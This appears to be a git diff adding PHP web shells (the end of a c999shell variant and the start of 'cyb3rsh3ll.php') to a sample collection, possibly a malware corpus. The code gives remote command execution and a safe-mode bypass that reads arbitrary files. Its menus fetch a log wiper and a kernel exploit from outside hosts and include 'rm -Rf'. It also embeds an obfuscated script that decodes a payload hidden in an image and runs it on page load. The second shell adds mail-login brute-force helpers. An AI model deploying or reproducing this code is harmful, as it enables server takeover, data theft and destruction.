2921"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
2922"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
2923"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
2924"ADs=",
2925"ext_log"=>
2926"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
2927"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
2928"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
2929"ext_php"=>
2930"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
2931"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
2932"ext_pl"=>
2933"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
2934"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
2935"ext_swf"=>
2936"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
2937"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
2938"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
2939"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
2940"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
2941"ext_tar"=>
2942"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
2943"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
2944"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
2945"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
2946"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2947"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2948"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2949"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
2950"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
2951"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
2952"u4tLAgEAOw==",
2953"ext_txt"=>
2954"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
2955"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
2956"UpPWG3Ig6Hq/XmRjuZwkAAA7",
2957"ext_wri"=>
2958"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
2959"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
2960"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
2961"ext_xml"=>
2962"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
2963"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2964"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
2965"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
2966"IQA7"
2967 );
2968 //For simple size- and speed-optimization.
2969 $imgequals = array(
2970 "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
2971 "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
2972 "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
2973 "ext_html"=>array("ext_html","ext_htm"),
2974 "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
2975 "ext_lnk"=>array("ext_lnk","ext_url"),
2976 "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
2977 "ext_doc"=>array("ext_doc","ext_dot"),
2978 "ext_js"=>array("ext_js","ext_vbs"),
2979 "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
2980 "ext_wri"=>array("ext_wri","ext_rtf"),
2981 "ext_swf"=>array("ext_swf","ext_fla"),
2982 "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
2983 "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
2984 );
2985 if (!$getall)
2986 {
2987 header("Content-type: image/gif");
2988 header("Cache-control: public");
2989 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
2990 header("Cache-control: max-age=".(60*60*24*7));
2991 header("Last-Modified: ".date("r",filemtime(__FILE__)));
2992 foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
2993 if (empty($images[$img])) {$img = "small_unk";}
2994 if (in_array($img,$ext_tar)) {$img = "ext_tar";}
2995 echo base64_decode($images[$img]);
2996 }
2997 else
2998 {
2999 foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
3000 natsort($images);
3001 $k = array_keys($images);
3002 echo "<center>";
3003 foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
3004 echo "</center>";
3005 }
3006 exit;
3007}
3008if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
3009?>
3010</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
3011<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
3012<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
3013<br>
3014<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
3015<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr>
3016<tr>
3017 <td width="50%" height="83" valign="top"><center>
3018 <div align="center">Useful Commands
3019 </div>
3020 <form action="<?php echo $surl; ?>">
3021 <div align="center">
3022 <input type=hidden name=act value="cmd">
3023 <input type=hidden name="d" value="<?php echo $dispd; ?>">
3024 <SELECT NAME="cmd">
3025 <OPTION VALUE="uname -a">Kernel version
3026 <OPTION VALUE="w">Logged in users
3027 <OPTION VALUE="lastlog">Last to connect
3028 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
3029 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
3030 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
3031 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
3032 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
3033 <OPTION VALUE="netstat -atup | grep IST">Open ports
3034 <OPTION VALUE="locate gcc">gcc installed?
3035 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
3036 <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
3037 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
3038 <OPTION VALUE="./zap2">WIPELOGS PT3
3039 <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
3040 <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
3041 <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
3042 <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
3043 <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
3044 <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)
3045 </SELECT>
3046 <input type=hidden name="cmd_txt" value="1">
3047 &nbsp;
3048 <input type=submit name=submit value="Execute">
3049 <br>
3050 Warning. Kernel may be alerted using higher levels </div>
3051 </form>
3052 </td>
3053 <td width="50%" height="83" valign="top"><center>
3054 <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
3055 <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>">
3056 <input type="hidden" name="client" value="firefox-a">
3057 <input type="hidden" name="rls" value="org.mozilla:en-US:official">
3058 <input type="hidden" name="hl" value="en">
3059 <input type="hidden" name="hs" value="b7p">
3060 <input type=submit name="btnG" VALUE="Search">
3061 </form></center>
3062 </td>
3063</tr></TABLE><br>
3064<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
3065<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr>
3066<tr>
3067 <td width="50%" height="83" valign="top"><center>
3068 <div align="center">Php Safe-Mode Bypass (Read Files)
3069 </div><br>
3070 <form action="<?php echo $surl; ?>">
3071 <div align="center">
3072 File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
3073
3074
3075
3076
3077
3078
3079 <?
3080
3081 function rsg_read()
3082 {
3083 $test="";
3084 $temp=tempnam($test, "cx");
3085 $file=$_GET['file'];
3086 $get=htmlspecialchars($file);
3087 echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
3088 if(copy("compress.zlib://".$file, $temp)){
3089 $fichier = fopen($temp, "r");
3090 $action = fread($fichier, filesize($temp));
3091 fclose($fichier);
3092 $source=htmlspecialchars($action);
3093 echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
3094 unlink($temp);
3095 } else {
3096 die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
3097 <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
3098 access.</CENTER></FONT>");
3099 }
3100 echo "</div>";
3101 }
3102
3103 if(isset($_GET['file']))
3104{
3105rsg_read();
3106}
3107
3108 ?>
3109
3110 <?
3111
3112 function rsg_glob()
3113{
3114$chemin=$_GET['directory'];
3115$files = glob("$chemin*");
3116echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
3117foreach ($files as $filename) {
3118 echo "<pre>";
3119 echo "$filename\n";
3120 echo "</pre>";
3121}
3122}
3123
3124if(isset($_GET['directory']))
3125{
3126rsg_glob();
3127}
3128
3129?>
3130
3131 <br>
3132 </div>
3133 </form>
3134 </td>
3135 <td width="50%" height="83" valign="top"><center>
3136 <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>">
3137 <div align="center"><br>
3138 Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
3139
3140 </form></center>
3141 </td>
3142</tr></TABLE><br>
3143<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
3144<script type="text/javascript">
3145if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
3146setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(0);}, 500);
3147</script>
3148<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
3149<tr>
3150 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
3151 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
3152</tr>
3153</table>
3154<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
3155<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
3156<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c999shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> Shadow & Preddy | <a href="http://rootshell-security.net"><font color="#FF0000">RootShell Security Group</font></a><font color="#FF0000"></font> | <a href="http://r57shell.net"><font color="#FF0000">r57 c99 shell</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
3157</body></html><?php chdir($lastdir); c999shexit(); ?> \ No newline at end of file
diff --git a/data/samples/classic/cyb3rsh3ll.php b/data/samples/classic/cyb3rsh3ll.php
new file mode 100644
index 0000000..e0e0095
--- /dev/null
+++ b/data/samples/classic/cyb3rsh3ll.php
@@ -0,0 +1,7923 @@
1<?php
2//Authentication
3$lock = "on"; // set this to off if you dont need the login page
4$user = "cyber";
5$pass = "gladiator";
6$antiCrawler = "on"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
7$tracebackFeature = "off"; // set this feature to on to enable email alerts
8$log_email = "cyb3r.gladiat0r@gmail.com"; //Default e-mail for sending logs
9
10@ignore_user_abort(TRUE);
11@set_magic_quotes_runtime(0);
12error_reporting(5);
13$phpVersion = phpversion();
14$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
15$win = strtolower(substr(PHP_OS,0,3)) == "win";
16$shver = "1.0"; //Current version
17if (!function_exists("getmicrotime")) {
18 function getmicrotime() {
19 list($usec, $sec) = explode(" ", microtime());
20 return ((float)$usec + (float)$sec);
21 }
22 }
23
24define("starttime",getmicrotime());
25
26if (get_magic_quotes_gpc()) {
27 if (!function_exists("strips")) {
28 function strips(&$arr,$k="") {
29 if (is_array($arr)) {
30 foreach($arr as $k=>$v) {
31 if (strtoupper($k) != "GLOBALS") {
32 strips($arr["$k"]);
33 }
34 }
35 } else {
36 $arr = stripslashes($arr);
37 }
38 }
39 }
40 strips($GLOBALS);
41}
42
43foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
44if (!empty($unset_surl)) {setcookie("cyb3r_surl"); $surl = "";}
45elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("cyb3r_surl",$surl);}
46else {$surl = $_REQUEST["cyb3r_surl"]; //Set this cookie for manual SURL
47
48}
49$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
50if ($surl_autofill_include and !$_REQUEST["cyb3r_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
51
52if (empty($surl))
53{ $surl = "?".$includestr; }//Self url
54$surl = htmlspecialchars($surl);
55$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
56
57$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";
58//DON'T FORGOT ABOUT PASSWORD!!!
59
60$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
61$gzipencode = False; //Encode with gzip?
62
63$ax4 ="http://";
64$filestealth = TRUE; //if TRUE, don't change modify- and access-time
65
66$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";
67$release = @php_uname('r');
68$kernel = @php_uname('s');
69$expltlink='http://www.exploit-db.com/search/?action=search&filter_exploit_text=';
70if( strpos('Linux', $kernel) !== false )
71 $expltlink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
72else
73 $expltlink .= urlencode( $kernel . ' ' . substr($release,0,3) );
74
75/* If you publish free shell and you wish add link to your site or any other information, put here your html. */
76
77$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
78
79$curdir = "./"; //start folder
80
81//$curdir = getenv("DOCUMENT_ROOT");
82$curdir = getcwd();
83$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
84
85$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
86
87
88$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
89
90$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
91
92if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
93function imaplogiN($host,$username,$password){
94$sock=fsockopen($host,143,$n,$s,5);
95$b=namE();
96$l=strlen($b);
97if(!$sock)return -1;
98fread($sock,1024);
99fputs($sock,"$b LOGIN $username $password\r\n");
100$res=fgets($sock,$l+4);
101if ($res == "$b OK")return 1;else return 0;
102fclose($sock);
103}
104function pop3logiN($server,$user,$pass){
105$sock=fsockopen($server,110,$en,$es,5);
106if(!$sock)return -1;
107fread($sock,1024);
108fwrite($sock,"user $user\n");
109$r=fgets($sock);
110if($r{0}=='-')return 0;
111fwrite($sock,"pass $pass\n");
